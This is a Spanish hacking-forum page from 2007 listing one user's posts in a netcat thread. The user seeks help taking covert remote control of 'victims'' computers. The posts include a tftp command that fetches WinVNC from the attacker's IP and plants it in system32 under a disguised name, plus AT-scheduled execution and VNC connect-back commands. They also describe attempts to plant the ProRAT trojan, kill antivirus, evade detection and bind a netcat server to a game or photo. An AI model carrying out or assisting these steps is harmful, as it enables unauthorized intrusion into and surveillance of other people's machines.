elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7
31  Seguridad Informática / Hacking / Re: Jugando con netcat en: 27 Junio 2007, 10:50 am
WHK ejecuto eso desde mi shell? no pasa nada, no me conecta

Pongo en mi shell:
winvnc -register
Winvnc -start
Winvnc -connect su ip

y si lo hago desde la shell de la victima nada tampoco, no lo entendi muy bien.

Saludos
32  Seguridad Informática / Hacking / Re: Jugando con netcat en: 26 Junio 2007, 14:40 pm
Hola de nuevo, he conseguido shell de nuevo de un amigo y le hize todos los pasos para subirle vnc, incluido los comandos AT tambien bien. pero cuando voy a abrir el vnc me pone siempre el mismo error-> Invalid VNC server specified. Server should be of the form host:display

no tiene router, pero nose xq me pone eso!


Y otra cosa que intento es meterle el troyano prorat, pero el antivirus me lo elimina...y no pudo quitar el nod32 con tasskill!

saludos
33  Seguridad Informática / Hacking / Re: Jugando con netcat en: 25 Junio 2007, 19:22 pm
Buenas, he conseguido una shell, y por ftp le he subido los 4 archivos que pone en el manual para conectar por Winvnc, peroo hay una cosa que no entiendo. y es cuando pongo at "la hora" /interactive "qttask.exe"

Una vez pasa la hora y pongo el comando at para ver si ya no hay entradas, sigue estando la entrada esa que puse, por que?  Espero haberme explicado bien, y si nos lo intento explicar mejor.

si pongo tasklist me sale el qttask.exe pero voy al cliente de winvnc. pongo la ip, y me pone: Invalid VNC server specified. Server should be of the form host:display

Saludos.
34  Seguridad Informática / Hacking / Re: Jugando con netcat en: 21 Junio 2007, 12:45 pm
Tengo un problema con el servidor de netcat, por muxo que se conecten las victima a mi conr everse shell...
  mi desconexion cuando se cae ya no puedo volver a entrar por shell a mi victima hasta que no reinicia pc.
  No puedo subirle archivos con el tftp, me dice tiempo de espera agotado
  Y miro a ver si se le ha subido el archivo que le mandado y nada, se le subo un archivo que pone TFTP272 con 0 kilobytes, vamos que eso no es.

Algun solucion?
35  Seguridad Informática / Hacking / Re: Jugando con netcat en: 20 Junio 2007, 22:46 pm
No deberías usar tus "conocimientos" para venganza, eso suele ser mas de lammers.

Saludos.
36  Seguridad Informática / Hacking / Re: Jugando con netcat en: 20 Junio 2007, 16:35 pm
Una vez conseguido la shell, para subirle el vnc, pongo:

tftp -i MIIP get WinVNC.exe c:\WINDOWS\system32\gttask.exe

y luego me dice tiempo de espera agotado, por que no va?¿

Saludos.
37  Seguridad Informática / Hacking / Re: Jugando con netcat en: 20 Junio 2007, 11:50 am
Se podría hacer este servidor de netcat indetectable? por que varios antivirus lo detectan.

Saludos
38  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Junio 2007, 23:25 pm
vale, ya pude, gracias.
39  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Junio 2007, 22:20 pm
me lo he bajado y al abrir el cactus me da un error y me pone:

component "COMDLG32.OCX" or one  of its dependencies not correctly registered: a file is missing or invalid

Alguna idea?
40  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Junio 2007, 21:03 pm
Yo he hecho el server de netcat como dice el manual pero sin poner ningun icono ni nada, se queda con el icono de sfx de winrar. Pero ahora para agregar ese server a un juego o una foto, como lo puedo hacer?

Saludos
Páginas: 1 2 3 [4] 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines